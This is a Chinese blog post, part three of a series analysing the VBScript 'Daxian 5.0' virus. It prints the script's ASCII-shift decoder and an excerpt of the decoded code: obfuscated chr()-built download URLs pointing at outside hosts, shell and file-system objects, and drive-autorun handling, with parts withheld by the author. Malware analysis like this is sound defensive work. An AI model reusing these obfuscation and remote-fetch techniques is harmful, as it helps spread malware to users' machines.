网聚无限美与忆

公告

日历

2007年11月

日

一

二

三

四

五

六

统计

随笔 - 70
文章 - 11
评论 - 99
引用 - 0

随笔分类

随笔档案

文章分类

文章档案

相册

photo spring

收藏夹

小包包(1) (rss)

链接无限

搜索

积分与排名

积分 - 64167
排名 - 56

阅读排行榜

Daxian病毒5.0版分析志（三）

由于本博旨在研究此病毒，不在传播，所以会隐去一些代码，见谅

以下是那个vbs脚本里的真实代码部分(经过转码)：

Da="ire=0.5gvyr=qnkvna&ire nobhg=raq /////shapgvba"

以上//////部分为隐去的代码

以下是那个vbs脚本里的代码部分(用来解码)：

Execute("For i=1 To Len(Da)"+vbCrLf+"Xian = Asc(Mid(Da,i,1))"+vbCrLf+"If Xian = 28 Then"+vbCrLf+"Xian = 13"+vbCrLf+"ElseIf Xian = 29 Then"+vbCrLf+"Xian = 10"+vbCrLf+"elseif Xian=18 Then"+vbCrLf+"Xian = 34"+vbCrLf+"elseif Xian>96 and Xian<110 then"+vbCrLf+"Xian=Xian+13"+vbCrLf+"elseif Xian>109 and Xian<123 then"+vbCrLf+"Xian=Xian-13"+vbCrLf+"elseif Xian>47 and Xian<53 then"+vbCrLf+"Xian=Xian+5"+vbCrLf+"elseif Xian>52 and Xian<58 then"+vbCrLf+"Xian=Xian-5"+vbCrLf+"End If"+vbCrLf+"DaXian = DaXian + chr(Xian)"+vbCrLf+"Next")
2

Execute(DaXian)

从上面的代码，大家不难看出，这是通过字符的ASCII码来进行转码的，所以解起来比较容
易，有兴趣的博友可以自己写个程序解一下。

我解出来的代码如下：

ver="5.0"
2

tile="daxian"&ver
3

about="daxianbiyeliunian 2007.8.7"
4

fromurl2=chr(104)&chr(116)&chr(116)&chr(112)&"://"&"u4."&chr(50)&chr(50)&chr(56)&"8.or"&chr(103)&"/u5."&chr(97)&"s"&chr(112)
5

fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(104)&chr(103)&"z."&chr(100)&"in"&chr(103)&chr(104)&"ui123."&chr(99)&"n/u5."&chr(97)&"s"&chr(112)
6

on error resume next
7

dim wsh
8

dim WshShell
9

Set Wsh =CreateObject("WScript.Shell")
10

set WshShell=Wscript.CreateObject("Wscript.Shell")
11

Set FSO = CreateObject("Scripting.FileSystemObject")
12

set dir = FSO.GetSpecialFolder(1)
13

set win = FSO.GetSpecialFolder(0)
14

Set dc = FSO.Drives
15

ouwnname=Wscript.ScriptName
16

exemulu=FSO.GetSpecialFolder(2)&"\"
17

mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))
18

if mulu=dir&"\" then sys=true
19

For Each d In dc
20

if mulu=d&"\" then opendisk=WshShell.Run("explorer "&d,3,false)
21

Next
22

'以下省略代码若干
23 .......................

总之代码所做的无非是做添加病毒文件和修改注册表一类的事情。

具体到VB脚本的分析偶就不再写了，以此和大家共同研究探讨。

(Daxian 5.0研究志完)

posted on 2007-11-09 13:42 【冰冻苔原】阅读(337) 评论(1) 编辑收藏所属分类: 编程&&电脑技术随笔

评论:

# re: Daxian病毒5.0版分析志（三） oil painting Posted @ 2009-02-16 15:55
=========健康iiiiiiiiiiiiiiiiii 回复更多评论

刷新评论列表

只有注册用户登录后才能发表评论。
该文被作者在 2007-11-13 13:36 编辑过


网站导航: 博客园 IT新闻知识库 Java博客 C++博客博问
相关文章: Daxian病毒5.0版分析志（三） Daxian病毒5.0版分析志（二） Daxian病毒5.0版分析志（一）路由器中config-register各位的含义以及配合TFTP服务的应用通过技术支持工作学到的20件事解决使用金山词霸的取词功能时卡巴斯基报错的问题解决部分USB设备无法正常识别和工作的问题 C++ 运算符优先级列表卡巴斯基终于恢复正常更新了~~ 彻底解决卡巴斯基抽羊角风的恶习[转]


Copyright © 【冰冻苔原】	Powered by: 博客园模板提供：沪江博客

导航

常用链接

留言簿(13)